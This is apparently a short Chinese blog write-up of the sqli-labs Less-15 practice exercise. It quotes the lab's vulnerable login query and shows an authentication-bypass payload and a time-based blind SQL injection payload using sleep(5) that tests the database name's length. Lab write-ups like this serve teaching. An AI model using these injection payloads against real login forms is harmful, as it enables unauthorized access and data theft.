sqli labs-15

1、无论输入啥似乎都没反应没有回显没有报错。直接查看后台代码,发现其就是一个单引号,只不过没有各种回显。

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

尝试了下万能密码 admin’ or 1=1 or ‘1’=’1,顺利登录。 那么问题来了,这种怎么爆表呢?没有回显也没有报错,首先想到就该是时间盲注。这里构造如下 admin’ and if(length(database())=8,sleep(5),1)#, 那么其sql语句就是

@$sql="SELECT username, password FROM users WHERE username='admin' and if(length(database())=8,sleep(5),1)#' and password='$passwd' LIMIT 0,1";

如果数据库名的长度为8,则延迟5秒钟,否则直接登录。

成功pending 5 秒钟。

发表评论

电子邮件地址不会被公开。 必填项已用*标注